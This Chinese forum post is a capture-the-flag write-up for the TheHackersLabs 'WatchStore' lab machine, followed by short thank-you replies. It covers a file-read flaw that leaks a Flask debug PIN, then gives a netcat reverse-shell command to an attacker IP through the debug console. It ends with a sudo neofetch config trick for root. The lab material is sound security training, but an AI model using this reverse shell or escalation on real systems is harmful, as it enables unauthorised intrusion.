劝匠注 发表于 2025-7-18 13:40:18

TheHackersLabs WatchStore writeup

信息收集

nmap



获取userFlag

访问8080

发现url变了,那这里就需要写hosts了,在hosts中添加域名对应关系后再次访问

扫一下目录,这里我先是用dirsearch扫,只得到了一个console页面,进去的话是需要输入PIN码,那这就说明后端应该用的是flask模板,且开启了debug。那么如果需要计算pin码的话就需要去读相应的文件,这就需要我们能够找到一个报错页面。所以很有可能还有一个页面是没有扫出来的,换dirb扫扫

果然拿到了一个read页面

这里提示有一个参数为id,随便传个值看看

根据报错信息,这里应该是一个文件读取的点,先读一下app.py

在最顶部发现了PIN码,这里是吧PIN码是硬编码的,看来是不需要计算了,然后就到console页面里,通过python代码弹shell
import os;os.system('busybox nc 192.168.43.180 8888 -e /bin/bash')
然后稳定shell后在家目录下就可以拿到userflag了
userflag:4b100d01fcf0d9ca1959dca8dbb18460(MD5)
获取rootFlag

sudo -l看一下

这个在GTFobins上是有利用方案的
echo 'exec /bin/bash' > shell
sudo -urootneofetch --config shell
这样就拿到root shell了
rootflag:aa41469df6e95166f9babccfbfc256c3(MD5)
 

来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

矛赓宁 发表于 2025-11-30 01:11:54

用心讨论,共获提升!

玻倌瞽 发表于 2025-12-9 10:28:16

这个好,看起来很实用

讲怔 发表于 2025-12-27 04:45:06

感谢发布原创作品,程序园因你更精彩

拼匍弦 发表于 2025-12-27 05:53:24

这个好,看起来很实用

梅克 发表于 2026-1-13 19:30:31

分享、互助 让互联网精神温暖你我

裴涛 发表于 2026-1-19 12:37:33

这个好,看起来很实用

盖彗云 发表于 2026-1-19 14:19:45

收藏一下   不知道什么时候能用到

百谖夷 发表于 2026-1-22 14:35:17

很好很强大我过来先占个楼 待编辑

笙芝 发表于 2026-1-30 13:22:01

分享、互助 让互联网精神温暖你我

骛扼铮 发表于 2026-2-2 04:37:20

谢谢分享,试用一下

松菊 发表于 2026-2-10 19:34:16

谢谢分享,辛苦了

奚娅琼 发表于 2026-2-11 22:44:07

前排留名,哈哈哈

郦珠雨 发表于 2026-2-12 03:53:54

收藏一下   不知道什么时候能用到

荪俗 发表于 2026-2-12 15:03:28

感谢分享

遑盲 发表于 2026-2-12 15:39:55

前排留名,哈哈哈

材部 发表于 2026-2-13 12:33:52

不错,里面软件多更新就更好了

孓访懔 发表于 2026-2-13 12:36:42

分享、互助 让互联网精神温暖你我

貊淀 发表于 2026-2-13 19:00:09

用心讨论,共获提升!
页: [1]
查看完整版本: TheHackersLabs WatchStore writeup